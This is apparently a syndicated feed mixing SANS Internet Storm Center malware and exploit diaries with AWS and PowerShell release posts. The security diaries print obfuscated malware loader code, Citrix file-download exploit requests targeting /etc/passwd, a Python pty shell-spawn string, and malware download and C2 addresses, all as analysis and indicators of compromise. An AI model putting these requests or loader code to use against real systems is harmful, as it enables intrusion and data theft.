Excel spreasheet macro kicks off Formbook infection, (Fri, Jul 10th)

This post was originally published on this site

Introduction

Formbook has been around for years.  According to FireEye, Formbook has been “..advertised in various hacking forums since early 2016.”  My previous diary about Formbook was back in November 2019, and not much has changed since then.  It still bears documentation, though, if only to show this malware is still active and remains part of our threat landscape.

Today’s diary covers a Formbook infection from Thursday, June 9th 2020.


Shown above:  Flow chart for the Formbook infection covered in today’s diary.

The lure

The lure for this particular infection was a malicious Excel spreadsheet.  Searching through VirusTotal, I found a malware sample that I tested in my lab.  The submission name was /tmp/eml_attach_for_scan/2433e76542036ab53b138a98eeda548a.file, so I don’t know what the original file name was.


Shown above: Malicious Excel spreadsheet I found in VirusTotal.


Shown above: The malicious spreadsheet opened on a vulnerable Windows 10 host, ready for me to enable macros.

Initial infection

The initial infection happened immediately after I enabled macros, when my lab host retireved a Windows executable (EXE) for Formbook from hxxp://sagc[.]be/svc.exe and executed the file.  See the images below for details.


Shown above:  My lab host retrieving the Formbook EXE from sagc[.]be after enabling macros.


Shown above: Initial location where the Formbook EXE was saved to my lab host.


Shown above:  Formbook EXE’s final location on my infected lab host with a Windows registry update to keep it persistent.

Data exfiltration

Post-infection traffic was sent to several different domains using URL patterns shown in the next image.


Shown above: Traffic from an infection filtered in Wireshark.

Data stolen by Formbook included a screenshot of my infected lab host, along with keystroke logs, application passwords, sensitive data from the browser chache, and information contained in the clipboard.  This data is temporarily stored in a randomly-named folder under the infected user’s AppDataRoaming directory.  These artifacts are deleted after the data is exfiltrated through Formbook command and control (C2) traffic.


Shown above: Stolen data from the infected Windows host, waiting for Formbook to exfiltrate it over C2 traffic.

Indicators of Compromise (IoCs)

SHA256 hash: 148a026124126abf74c390c69fbd0bcebce06b600c6a35630cdce29a85a765fc

  • File size: 94,829 bytes
  • File name: unknown
  • File type: Microsoft Excel 2007+
  • File description: Excel spreadsheet with macro for Formbook malware

SHA256 hash: 9ebc903ca6847352aaac87d7f904fe4009c4b7b7acc9b629e5610c0f04dac4ef

  • File size: 481,792 bytes
  • File location: hxxp://sagc[.]be/svc.exe
  • File location: C:Users[username]AppDataLocalTempputty.exe
  • File location: C:Program Files (x86)Bwlsuserwzqlrdw.exe
  • File description: Windows executable (EXE) file for Formbook malware

Traffic from an infected Windows host:

Excel macro retrieves Formbook EXE:

  • 92.48.206[.]34 port 80 – sagc[.]be – GET /svc.exe

Formbook post-infection traffic:

  • 157.7.107[.]81 port 80 – www.lovelydays[.]info – GET /ns424/?[long string]
  • 23.235.199[.]50 port 80 – www.rightwebmarketing[.]com – GET /ns424/?[long string]
  • 23.235.199[.]50 port 80 – www.rightwebmarketing[.]com – POST /ns424/
  • 63.250.34[.]167 port 80 – www.mansiobok2[.]info – GET /ns424/?[long string]
  • 63.250.34[.]167 port 80 – www.mansiobok2[.]info – POST /ns424/
  • 34.102.136[.]180 port 80 – www.confidentbeauty[.]tips – GET /ns424/?[long string]
  • 34.102.136[.]180 port 80 – www.confidentbeauty[.]tips – POST /ns424/
  • 198.54.117[.]217 port 80 – www.donateoneeight[.]net – GET /ns424/?[long string]
  • 198.54.117[.]217 port 80 – www.donateoneeight[.]net – POST /ns424/

Unresolved DNS queries from the infected Windows host caused by Formbook:

  • DNS query for www.bakingandcookingandmore[.]com – response: No such name
  • DNS query for www.systemscan12[.]top – response: No such name
  • DNS query for www.lux-dl[.]com – response: No such name
  • DNS query for www.duongtinhot24h[.]com – response: No such name
  • DNS query for www.kcsmqd[.]com – response: No such name
  • DNS query for www.pksbarandgrill[.]net – response: No such name
  • DNS query for www.lx-w[.]com – response: No such name
  • DNS query for www.costcocanadaliguor[.]com – response: No such name
  • DNS query for www.autohaker[.]com – response: No such name
  • DNS query for www.e-golden-boy[.]com – response: No such name
  • DNS query for www.angelalevelsup[.]com – response: No such name

Final words

Formbook infections work nearly the same as they did when I wrote my first diary about Formbook in October 2017.  I’m surprised that I still occasionally run across a sample during my day-to-day research.  An up-to-date Windows 10 with default security settings should prevent these sorts of infection from happening.  I guess it’s still somehow profitable for criminals behind Formbook to continue developing this malware.  Apparently, there’s no shortage of vulnerable Windows hosts for potential targets.

A pcap of the infection traffic and malware samples for today’s diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Create Snapshots From Any Block Storage Using EBS Direct APIs

This post was originally published on this site

I am excited to announce you can now create Amazon Elastic Block Store (EBS) snapshots from any block storage data, such as on-premises volumes, volumes from another cloud provider, existing block data stored on Amazon Simple Storage Service (S3), or even your own laptop πŸ™‚

AWS customers using the cloud for disaster recovery of on-premises infrastructure all have the same question: how can I transfer my on-premises volume data to the cloud efficiently and at low cost? You usually create temporary Amazon Elastic Compute Cloud (EC2) instances, attach Amazon Elastic Block Store (EBS) volumes, transfer the data at block level from on-premises to these new Amazon Elastic Block Store (EBS) volumes, take a snapshot of every EBS volumes created and tear-down the temporary infrastructure. Some of you choose to use CloudEndure to simplify this process. Or maybe you just gave up and did not copy your on-premises volumes to the cloud because of the complexity.

To simplify this, we are announcing today 3 new APIs that are part of EBS direct API, a new set of APIs we announced at re:Invent 2019. We initially launched a read and diff APIs. We extend it today with write capabilities. These 3 new APIs allow to create Amazon Elastic Block Store (EBS) snapshots from your on-premises volumes, or any block storage data that you want to be able to store and recover in AWS.

With the addition of write capability in EBS direct API, you can now create new snapshots from your on-premises volumes, or create incremental snapshots, and delete them. Once a snapshot is created, it has all the benefits of snapshots created from Amazon Elastic Block Store (EBS) volumes. You can copy them, share them between AWS Accounts, keep them available for a Fast Snapshot Restore, or create Amazon Elastic Block Store (EBS) volumes from them.

Having Amazon Elastic Block Store (EBS) snapshots created from any volumes, without the need to spin up Amazon Elastic Compute Cloud (EC2) instances and Amazon Elastic Block Store (EBS) volumes, allows you to simplify and to lower the cost of the creation and management of your disaster recovery copy in the cloud.

Let’s have a closer look at the API
You first call StartSnapshot to create a new snapshot. When the snapshot is incremental, you pass the ID of the parent snapshot. You can also pass additional tags to apply to the snapshot, or encrypt these snapshots and manage the key, just like usual. If you choose to encrypt snapshots, be sure to check our technical documentation to understand the nuances and options.

Then, for each block of data, you call PutSnapshotBlock. This API has 6 mandatory parameters: snapshot-id, block-index, block-data, block-length, checksum, and checksum-algorithm. The API supports block lengths of 512 KB. You can send your blocks in any order, and in parallel, block-index keeps the order correct.

After you send all the blocks, you call CompleteSnapshot with changed-blocks-count parameter having the number of blocks you sent.

Let’s put all these together
Here is the pseudo code you must write to create a snapshot.

AmazonEBS amazonEBS = AmazonEBSClientBuilder.standard()
   .withEndpointConfiguration(new AwsClientBuilder.EndpointConfiguration(endpointName, awsRegion))
   .withCredentials(credentialsProvider)
   .build();

response = amazonEBS.startSnapshot(startSnapshotRequest)
snapshotId = response.getSnapshotId();

for each (block in changeset) {
    putResponse = amazonEBS.putSnapshotBlock(putSnapshotBlockRequest);
}
amazonEBS.completeSnapshot(completeSnapshotRequest);

As usual, when using this code, you must have appropriate IAM policies allowing to call the new API. For example:

{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": [
"ebs:StartSnapshot",
"ebs:PutSnapshotBlock",
"ebs:CompleteSnapshot"
],
"Resource": "arn:aws:ec2:<Region>::snapshot/*" }]

Also include some KMS related permissions when creating encrypted snapshots.

In addition of the storage cost for snapshots, there is a charge per API call when you call PutSnapshotBlock.

These new snapshot APIs are available in the following AWS Regions: US East (Ohio), US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Hong Kong), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), China (Beijing), China (Ningxia), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), Europe (Stockholm), Middle East (Bahrain), and South America (São Paulo).

You can start to use them today.

— seb

AWS IoT SiteWise – Now Generally Available

This post was originally published on this site

At AWS re:Invent 2018, we announced AWS IoT SiteWise in preview which is a fully managed AWS IoT service that you can use to collect, organize, and analyze data from industrial equipment at scale.

Getting performance metrics from industrial equipment is challenging because data is often locked into proprietary on-premises data stores and typically requires specialized expertise to retrieve and place in a format that is useful for analysis. AWS IoT SiteWise simplifies this process by providing software running on a gateway that resides in your facilities and automates the process of collecting and organizing industrial equipment data.

With AWS IoT SiteWise, you can easily monitor equipment across your industrial facilities to identify waste, such as breakdown of equipment and processes, production inefficiencies, and defects in products.

Last year at AWS re:Invent 2019, a bunch of new features were launched including SiteWise Monitor. Today, I am excited to announce AWS IoT SiteWise is now generally available in regions of US East (N. Virginia), Europe (Ireland), Europe (Frankfurt), and US West (Oregon). Let’s see how AWS IoT SiteWise works!

AWS IoT SiteWise – Getting Started
You can easily explore AWS IoT SiteWise by creating a demo wind farm with a single click on the AWS IoT SiteWise console. The demo deploys an AWS CloudFormation template to create assets and generate sample data for up to a week under AWS Free Tier.

You can find the SiteWise demo in the upper-right corner of the AWS IoT SiteWise console, and choose Create demo. The demo takes around 3 minutes to create demo models and assets for representing a wind farm.

Once you see created assets in the console, you can create virtual representations of your industrial operations with AWS IoT SiteWise assets. An asset can represent a device, a piece of equipment, or a process that uploads one or more data streams to the AWS Cloud. For example, the wind turbine that sends air temperature, propeller rotation speed, and power output time-series measurements to asset properties in AWS IoT SiteWise.

Also, you can securely collect data from the plant floor from sensors, equipment, or a local on-premises gateway and upload to the AWS Cloud using a gateway software called AWS IoT SiteWise Connector. It runs on common industrial gateway devices running AWS IoT Greengrass, and reads data directly from servers and historians over the OPC Unified Architecture protocol. AWS IoT SiteWise also accepts MQTT data through AWS IoT Core, and direct ingestion using REST API.

You can learn how to collect data using AWS IoT SiteWise Connector in the blog series – Part 1 of AWS IoT Blog and in the service documentation.

SiteWise Monitor – Creating Managed Web Applications
Once data is stored in AWS IoT SiteWise, you can stream live data in near real-time and query historical data to build downstream IoT applications, but we provide a no-code alternative with SiteWise Monitor. You can explore your library of assets, and create and share operational dashboards with plant operators for real-time monitoring and visualization of equipment health and output with SiteWise Monitor.

With SiteWise Monitor console, choose Create portal to create a web application that is accessible from from a web browser on any web-enabled desktop, tablet or phone and sign-in with your corporate credentials through AWS Single Sign-On (SSO) experience.

Administrators can create one or more web applications to easily share access to asset data with any team in your organization to accelerate insights.

If you click a given portal link and sign in via the credential of AWS SSO, you can visualize and monitor your device, process, and equipment data to quickly identify issues and improve operational efficiency with SiteWise Monitor

You can create a dashboard in a new project for your team so they can visualize and understand your project data. And, choose a visualization type that best displays your data and rearrange and resize visualizations to create a layout that fits your team’s needs.

The dashboard shows asset data and computed metrics in near real time or you can compare and analyze historical time series data from multiple assets and different time periods. There is a new dashboard feature, where you can specify thresholds on the charts and have the charts change color when those thresholds are exceeded.

Also, you can learn how to monitor key measurements and metrics of your assets in near-real time using SiteWise Monitor in the blog series – Part 2 of AWS IoT Blog.

Furthermore, you can subscribe to the AWS IoT SiteWise modeled data via AWS IoT Core rules engine, enable condition monitoring and send notifications or alerts using AWS IoT Events in near-real time, and enable Business Intelligence (BI) reporting on historical data using Amazon QuickSight. For more detail, please refer to this hands-on guide in the blog series – Part 3 of AWS IoT Blog.

Now Available!
With AWS IoT SiteWise, you only pay for what you use with no minimum fees or mandatory service usage. You are billed separately for usage of messaging, data storage, data processing, and SiteWise Monitor. This approach provides you with billing transparency because you only pay for the specific AWS IoT SiteWise resources you use. Please visit the pricing page to learn more and estimate your monthly bill using the AWS IoT SiteWise Calculator.

You can watch interesting talks about business cases and solutions in ‘Driving Overall Equipment Effectiveness (OEE) Across Your Industrial Facilities’ and ‘Building an End-to-End Industrial IoT (IIoT) Solution with AWS IoT‘. To learn more, please visit the AWS IoT SiteWise website or the tutorial, and developer guide.

Explore AWS IoT SiteWise with Bill Vass and Cherie Wong!

Please send us feedback either in the forum for AWS IoT SiteWise or through your usual AWS support contacts.

Channy;

AWS Well-Architected Framework – Updated White Papers, Tools, and Best Practices

This post was originally published on this site

We want to make sure that you are designing and building AWS-powered applications in the best possible way. Back in 2015 we launched AWS Well-Architected to make sure that you have all of the information that you need to do this right. The framework is built on five pillars:

Operational Excellence – The ability to run and monitor systems to deliver business value and to continually improve supporting processes and procedures.

Security – The ability to protect information, systems, and assets while delivering business value through risk assessments and mitigation strategies.

Reliability – The ability of a system to recover from infrastructure or service disruptions, dynamically acquire computing resources to meet demand, and mitigate disruptions such as misconfigurations or transient network issues.

Performance Efficiency – The ability to use computing resources efficiently to meet system requirements, and to maintain that efficiency as demand changes and technologies evolve.

Cost Optimization – The ability to run systems to deliver business value at
the lowest price point.

Whether you are a startup, a unicorn, or an enterprise, the AWS Well-Architected Framework will point you in the right direction and then guide you along the way as you build your cloud applications.

Lots of Updates
Today we are making a host of updates to the Well-Architected Framework! Here’s an overview:

Well-Architected Framework -This update includes new and updated questions, best practices, and improvement plans, plus additional examples and architectural considerations. We have added new best practices in operational excellence (organization), reliability (workload architecture), and cost optimization (practice Cloud Financial Management). We are also making the framework available in eight additional languages (Spanish, French, German, Japanese, Korean, Brazilian Portuguese, Simplified Chinese, and Traditional Chinese). Read the Well-Architected Framework (PDF, Kindle) to learn more.

Pillar White Papers & Labs – We have updated the white papers that define each of the five pillars with additional content, including new & updated questions, real-world examples, additional cross-references, and a focus on actionable best practices. We also updated the labs that accompany each pillar:

Well-Architected Tool – We have updated the AWS Well-Architected Tool to reflect the updates that we made to the Framework and to the White Papers.

Learning More
In addition to the documents that I linked above, you should also watch these videos.

In this video, AWS customer Cox Automotive talks about how they are using AWS Well-Architected to deliver results across over 200 platforms:

In this video, my colleague Rodney Lester tells you how to build better workloads with the Well-Architected Framework and Tool:

Get Started Today
If you are like me, a lot of interesting services and ideas are stashed away in a pile of things that I hope to get to “someday.” Given the importance of the five pillars that I mentioned above, I’d suggest that Well-Architected does not belong in that pile, and that you should do all that you can to learn more and to become well-architected as soon as possible!

Jeff;

New – Label Videos with Amazon SageMaker Ground Truth

This post was originally published on this site

Launched at AWS re:Invent 2018, Amazon Sagemaker Ground Truth is a capability of Amazon SageMaker that makes it easy to annotate machine learning datasets. Customers can efficiently and accurately label image, text and 3D point cloud data with built-in workflows, or any other type of data with custom workflows. Data samples are automatically distributed to a workforce (private, 3rd party or MTurk), and annotations are stored in Amazon Simple Storage Service (S3). Optionally, automated data labeling may also be enabled, reducing both the amount of time required to label the dataset, and the associated costs.

As models become more sophisticated, AWS customers are increasingly applying machine learning prediction to video content. Autonomous driving is perhaps the most well-known use case, as safety demands that road condition and moving objects be correctly detected and tracked in real-time. Video prediction is also a popular application in Sports, tracking players or racing vehicles to compute all kinds of statistics that fans are so fond of. Healthcare organizations also use video prediction to identify and track anatomical objects in medical videos. Manufacturing companies do the same to track objects on the assembly line, parcels for logistics, and more. The list goes on, and amazing applications keep popping up in many different industries.

Of course, this requires building and labeling video datasets, where objects of interest need to be labeled manually. At 30 frames per second, one minute of video translates to 1,800 individual images, so the amount of work can quickly become overwhelming. In addition, specific tools have to be built to label images, manage workflows, and so on. All this work takes valuable time and resources away from an organization’s core business.

AWS customers have asked us for a better solution, and today I’m very happy to announce that Amazon Sagemaker Ground Truth now supports video labeling.

Customer use case: the National Football League
The National Football League (NFL) has already put this new feature to work. Says Jennifer Langton, SVP of Player Health and Innovation, NFL: “At the National Football League (NFL), we continue to look for new ways to use machine learning (ML) to help our fans, broadcasters, coaches, and teams benefit from deeper insights. Building these capabilities requires large amounts of accurately labeled training data. Amazon SageMaker Ground Truth was truly a force multiplier in accelerating our project timelines. We leveraged the new video object tracking workflow in addition to other existing computer vision (CV) labeling workflows to develop labels for training a computer vision system that tracks all 22 players as they move on the field during plays. Amazon SageMaker Ground Truth reduced the timeline for developing a high quality labeling dataset by more than 80%”.

Courtesy of the NFL, here are a couple of predicted frames, showing helmet detection in a Seattle Seahawks video. This particular video has 353 frames. This first picture is frame #100.

Object tracking

This second picture is frame #110.

Object tracking

Introducing Video Labeling
With the addition of video task types, customers can now use Amazon Sagemaker Ground Truth for:

  • Video clip classification
  • Video multi-frame object detection
  • Video multi-frame object tracking

The multi-frame task types support multiple labels, so that you may label different object classes present in the video frames. You can create labeling jobs to annotate frames from scratch, as well as adjustment jobs to review and fine tune frames that have already been labeled. These jobs may be distributed either to a private workforce, or to a vendor workforce you picked on AWS Marketplace.

Using the built-in GUI, workers can then easily label and track objects across frames. Once they’ve annotated a frame, they can use an assistive labeling feature to predict the location of bounding boxes in the next frame, as you will see in the demo below. This significantly simplifies labeling work, saves time, and improves the quality of annotations. Last but not least, work is saved automatically.

Preparing Input Data for Video Object Detection and Tracking
As you would expect, input data must be located in S3. You may bring either video files, or sequences of video frames.

The first option is the simplest, as Amazon Sagemaker Ground Truth includes a tool that automatically extracts frames from your video files. Optionally, you can sample frames (1 in ‘n’), in order to reduce the amount of labeling work. The extraction tool also builds a manifest file describing sequences and frames. You can learn more about it in the documentation.

The second option requires two steps: extracting frames, and building the manifest file. Extracting frames can easily be performed with the popular ffmpeg open source tool. Here’s how you could convert the first 60 seconds of a video to a frame sequence.

$ ffmpeg -ss 00:00:00.00 -t 00:01:0.00 -i basketball.mp4 frame%04d.jpg

Each frame sequence should be uploaded to S3 under a different prefix, for example s3://my-bucket/my-videos/sequence1, s3://my-bucket/my-videos/sequence2, and so on, as explained in the documentation.

Once you have uploaded your frame sequences, you may then either bring your own JSON files to describe them, or let Ground Truth crawl your sequences and build the JSON files and the manifest file for you automatically. Please note that a video sequence cannot be longer than 2,000 frames, which corresponds to about a minute of video at 30 frames per second.

Each sequence should be described by a simple sequence file:

  • A sequence number, an S3 prefix, and a number of frames.
  • A list of frames: number, file name, and creation timestamp.

Here’s an example of a sequence file.

{"version": "2020-06-01",
"seq-no": 1, "prefix": "s3://jsimon-smgt/videos/basketball", "number-of-frames": 1800, 
	"frames": [
		{"frame-no": 1, "frame": "frame0001.jpg", "unix-timestamp": 1594111541.71155},
		{"frame-no": 2, "frame": "frame0002.jpg", "unix-timestamp": 1594111541.711552},
		{"frame-no": 3, "frame": "frame0003.jpg", "unix-timestamp": 1594111541.711553},
		{"frame-no": 4, "frame": "frame0004.jpg", "unix-timestamp": 1594111541.711555},
. . .

Finally, the manifest file should point at the sequence files you’d like to include in the labeling job. Here’s an example.

{"source-ref": "s3://jsimon-smgt/videos/seq1.json"}
{"source-ref": "s3://jsimon-smgt/videos/seq2.json"}
. . .

Just like for other task types, the augmented manifest is available in S3 once labeling is complete. It contains annotations and labels, which you can then feed to your machine learning training job.

Labeling Videos with Amazon SageMaker Ground Truth
Here’s a sample video where I label the first ten frames of a sequence. You can see a screenshot below.

I first use the Ground Truth GUI to carefully label the first frame, drawing bounding boxes for basketballs and basketball players. Then, I use the “Predict next” assistive labeling tool to predict the location of the boxes in the next nine frames, applying only minor adjustments to some boxes. Although this was my first try, I found the process easy and intuitive. With a little practice, I could certainly go much faster!

Getting Started
Now, it’s your turn. You can start labeling videos with Amazon Sagemaker Ground Truth today in the following regions:

  • US East (N. Virginia), US East (Ohio), US West (Oregon),
  • Canada (Central),
  • Europe (Ireland), Europe (London), Europe (Frankfurt),
  • Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Seoul), Asia Pacific (Sydney), Asia Pacific (Tokyo).

We’re looking forward to reading your feedback. You can send it through your usual support contacts, or in the AWS Forum for Amazon SageMaker.

– Julien

Active Exploit Attempts Targeting Recent Citrix ADC Vulnerabilities CTX276688 , (Thu, Jul 9th)

This post was originally published on this site

I just can’t get away from vulnerabilities in perimeter security devices. In the last couple of days, I spent a lot of time with our F5 BigIP honeypot. But looks like I have to revive the Citrix honeypot again. As of today, my F5 honeypot is getting hit by attempts to exploit two of the Citrix vulnerabilities disclosed this week [1]. Details with proof of concept code snippets were released yesterday [2].

It is not clear exactly which CVE was assigned to which vulnerability, but the possible candidates are CVE-2020-8195, CVE-2020-8196, 

The first issue, probably the more severe one, is allowing for arbitrary file downloads. I see this issue currently exploited from just one IP address: 13.232.154.46 (Amazon.. my honeypot must have Amazone Prime to get exploits next day).

POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 

The second vulnerability (which I don’t think has a CVE assigned to it, but I will update this diary if I find one), allows retrieval of a PCI-DSS report without authentication. Actually… you still need to “authenticate” I guess, by adding “sig_name=_default_signature_” to the URL :/. 

The full request I see being used (just the Apache log):

POST /pcidss/report?username=nsroot&set=1&type=allprofiles&sid=loginchallengeresponse1requestbody HTTP/1.1" 404 211 "-" "python-requests/2.19.1"

Interestingly: So far, most of the IPs that are scanning for this vulnerability belong to “hostwindsdns.com”

Current IPs:

23.254.164.181
23.254.164.48
43.245.160.163
104.168.166.234
104.168.194.148
142.11.213.254
142.11.227.204
192.119.73.107
192.119.73.108
192.236.162.232
192.236.163.117
192.236.163.119
192.236.192.119
192.236.192.3
192.236.192.5
192.236.192.6

The vulnerability isn’t all that “bad” (I have to look if the report leaks anything specific). It is not allowing access to anything else. But it could very well be used to identify unpatched devices. Some of the other vulnerabilities patched with this update are “interesting”, but more tricky to exploit.

[1] https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
[2] https://dmaasland.github.io/posts/citrix.html


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

If You Want Something Done Right, You Have To Do It Yourself… Malware Too!, (Wed, Jul 8th)

This post was originally published on this site

I’m teaching FOR610[1] this week and today is dedicated to malicious web and document files. That’s a good opportunity to share with you a Windows Script that uses a nice obfuscation technique. The attacker’s idea is to use a big array containing the second stage payload and interesting strings:

var Kerosene = [
function(){
var Odds = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC ….”;
return [function(){
eval("Odds = Odds.replace(new RegExp("!@@", "g"), "A");");
eval("x4Fx64x64x73x20x3Dx20x4Fx64x64x73x2Ex72x65x70x6Cx61x63x65x28x6Ex65x77x20x52x65x67x45x78x70x28x22x6Dx22x2Cx20x22x67x22x29x2Cx20x22x64x22x29x3B");
eval("x4Fx64x64x73x20x3Dx20x4Fx64x64x73x2Ex72x65x70x6Cx61x63x65x28x6Ex65x77x20x52x65x67x45x78x70x28x22x21x22x2Cx20x22x67x22x29x2Cx20x22x6Dx22x29x3B");
return Odds;
}][0]();
},
Array("CreateObject","ReadText","undefined","x61x64x6Fx64x62x2E","x43x68x61x72x53x65x74","x50x6Fx73x69x74x69x6Fx6E","x54x79x70x65","Open","Write","nodeTypedValue"),null
];

Like JavaScript, Windows Script is a language very permissive regarding data types and you can mix functions and strings in the same array. The first element of the array Kerozene[] is a function that deobfuscates a very long string that is also polluted with character substitutions. Once replaced, these characters with the right one, you can decode the Base64 string and get the second payload. The other elements are in a second array with some hex-encoded elements Then the following code is executed:

Kerosene[3] = Array(WSH[Kerosene[1][0]]("x61x64x6Fx64x62x2Ex73x74x72x65x61x6D"),
                    WSH[Kerosene[1][0]]("microsoft.xmldom").createElement("cfg"),
                    {bmx: "x75x73x2Dx61x73x63x69x69"});
Kerosene[4] = function(){return Kerosene[3][0];};
[function(){
  Kerosene[3][1].dataType = "x62x69x6Ex2Ex62x61x73x65x36x34";
  Kerosene[3][1].text = Kerosene[0]();
  [function(){
    eval("Kerosene[4]()[Kerosene[1][6]] = 1;Kerosene[4]()[Kerosene[1][7]]();Kerosene[4]()[Kerosene[1][8]]. (Kerosene[3][1][Kerosene[1][9]]);");
    eval("Kerosene[4]()[Kerosene[1][5]] = 0;Kerosene[4]()[Kerosene[1][6]] = 2;");
    eval("Kerosene[4]()[Kerosene[1][4]] = Kerosene[3][2].bmx;");
    eval("Kerosene = [Array(eval), Kerosene[4](), [Kerosene[1][1]]];");
  }][0]();
}][0]();

Kerosene[0][0](Kerosene[1][Kerosene[2]]());

How does it work? References to elements of the array are replaced by their value during the execution. Example:

WSH[Kerosene[1][0]]("x61x64x6Fx64x62x2Ex73x74x72x65x61x6D")

becomes:

WSH[CreateOject("adodb.stream")

The second payload implements the same obfuscation technique (a Base64 payload is decoded after replacing some garbage characters). The script applies the principle of “help yourself”. The interesting function is GrabJreFromNet() which tries to download a Java Runtime Environment if not already installed on the victim’s computer. The package is grabbed from this URL: hxxp://ops[.]com[.]pa/jre7.zip

The script performs the following test to detect if Java is available or not:

var text = "";
try {
  text = wshShell.RegRead("HKLMSOFTWAREWow6432NodeJavaSoftJava Runtime EnvironmentCurrentVersion");
  text = wshShell.RegRead("HKLMSOFTWAREWow6432NodeJavaSoftJava Runtime Environment" + text + "JavaHome");
} catch(err) {}
try {
  if (text == "") {
    text = wshShell.RegRead("HKLMSOFTWAREJavaSoftJava Runtime EnvironmentCurrentVersion");
    text = wshShell.RegRead("HKLMSOFTWAREJavaSoftJava Runtime Environment" + text + "JavaHome");
    if (text != "") {
      text = text + "binjavaw.exe";
    }
  }
  else {
    text = text + "binjavaw.exe";
  }
} catch(err) {}
try {
  if (text != "") {
    //wshShell.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionRunntfsmgr", """ + text + "" -jar "" + stubpath + """, "REG_SZ");
    wshShell.run (""" + text + "" -jar "" + stubpath + """);
  } else {
    GrabJreFromNet();
  }
} catch(err) {}

The third payload is a Zip file (a JAR file) that contains a classic AdWind backdoor (SHA256: 3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab)[2].

[1] http://for610.com
[2] https://www.virustotal.com/gui/file/3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

F5 BigIP vulnerability exploitation followed by a backdoor implant attempt, (Tue, Jul 7th)

This post was originally published on this site

While monitoring SANS Storm Center’s honeypots today, I came across the second F5 BIGIP CVE-2020-5902 vulnerability exploitation followed by a backdoor deployment attempt. The first one was seen by Johannes yesterday [1].

Running the backdoor binary (ELF) on a separate system, it was possible to verify that it establishes an SSL connection to the address web[.]vpnkerio.com (52[.]32.180.34:443).

Looking for the web[.]vpnkerio.com at VirusTotal while writing this diary, I could find no AV detecting the network addresses or the binary hash as malicious. 

For persistence, it writes a line on “/etc/init.d/rc.local” file on an attempt to start on system boot.

Examining the binary statically, it is possible to see the string’ python -c ‘import pty;pty.spawn(“/bin/sh”)’. It will require more analysis, but it may be used for the attacker to have an interactive terminal on the target system. A proper terminal is usually required for the attacker to run commands like ‘su’.

IOCs:

Exploitation attempt source
96[.]45.187.52

Backdoor URL:
http://104[.]238.140.239:8080/123
 

C2 communication
web[.]vpnkerio.com
52[.]32.180.34:443

The backdoor binary
90ce1320bd999c17abdf8975c92b08f7 (MD5)
a8acda5ddfc25e09e77bb6da87bfa157f204d38cf403e890d9608535c29870a0  (SHA256)

References

[1] https://isc.sans.edu/forums/diary/Summary+of+CVE20205902+F5+BIGIP+RCE+Vulnerability+Exploits/26316/


Renato Marinho
Morphus Labs| LinkedIn|Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

PowerShellGet 3.0 Preview 6 Release

This post was originally published on this site

Since our last blog post we have released two preview versions (previews 4 and 6) of the PowerShellGet 3.0 module. These releases have introduced publish functionality, repository wildcard search, and fixed error handling when a repository is not accessible in Find-PSResource. Note that preview 5 was unlisted due to a packaging error discovered post-publish.

To install the latest version module, open any PowerShell console and run:

Install-Module PowerShellGet -Force -AllowPrerelease -Repository PSGallery

Highlights of the releases

Preview 4 (3.0.0-beta4) Highlights

New Feature

Wildcard search for the -Repository parameter in Find-PSResource. This allows the user to return results from all registered PSRepositories instead of just their prioritized repository. To use this feature add -Repository '*' to your call to Find-PSResource.

Bug Fix

Fixed poor error handling for when repository is not accessible in Find-PSResource.

Preview 6 (3.0.0-beta6) Highlight

New Feature

The cmdlet Publish-PSResource was introduced which allows users to publish PowerShell resources to any registered PSRepository.

What’s next

We have 3 planned upcoming releases for the module:

  • The Preview 7 release will focus on update functionality, along with several bug fixes that have been reported by users through our preview releases.
  • The Release Candidate (RC) release will resolve any remaining bugs not resolved in our Preview 6 release.
  • The 3.0 General Availability (GA) release will be the same as the RC version so long as no blocking or high-risk bugs are found in the release candidate. If there are any blocking or high-risk bugs, we will release another release candidate before GA.

Migration to PowerShellGet 3.0

We hope to ship the the latest preview of PowerShellGet 3.0 in the next preview of PowerShell 7.1 (preview 6). The goal for this version of PowerShellGet, which will ship in PowerShell 7.1 preview 6, is to contain a compatibility module that will enable scripts with PowerShell 2.x cmdlets (ex. Install-Module) to be run using the PowerShellGet 3.0 module. This means that users will likely not need to update their scripts to use PowerShellGet 2.x cmdlets with PowerShell 7.1. It is important to note, as well, that on systems which contain any other version of PowerShell, the PowerShellGet 2.x module will still be available and used.

We hope to ship PowerShellGet 3.0 with a compatibility layer into PowerShell 7.1 as the sole version of PowerShellGet in the package. However, we will only do this if we reach GA, with a high bar for release quality, in time for the PowerShell 7.1 release candidate.

How to get support and give feedback

We cannot overstate how critical user feedback is at this stage in the development of the module. Feedback from preview releases help inform design decisions without incurring a breaking change once generally available and used in production. To help us to make key decisions around the behavior of the module please give us feedback by opening issues in our GitHub repository.

Sydney Smith PowerShell Team

The post PowerShellGet 3.0 Preview 6 Release appeared first on PowerShell.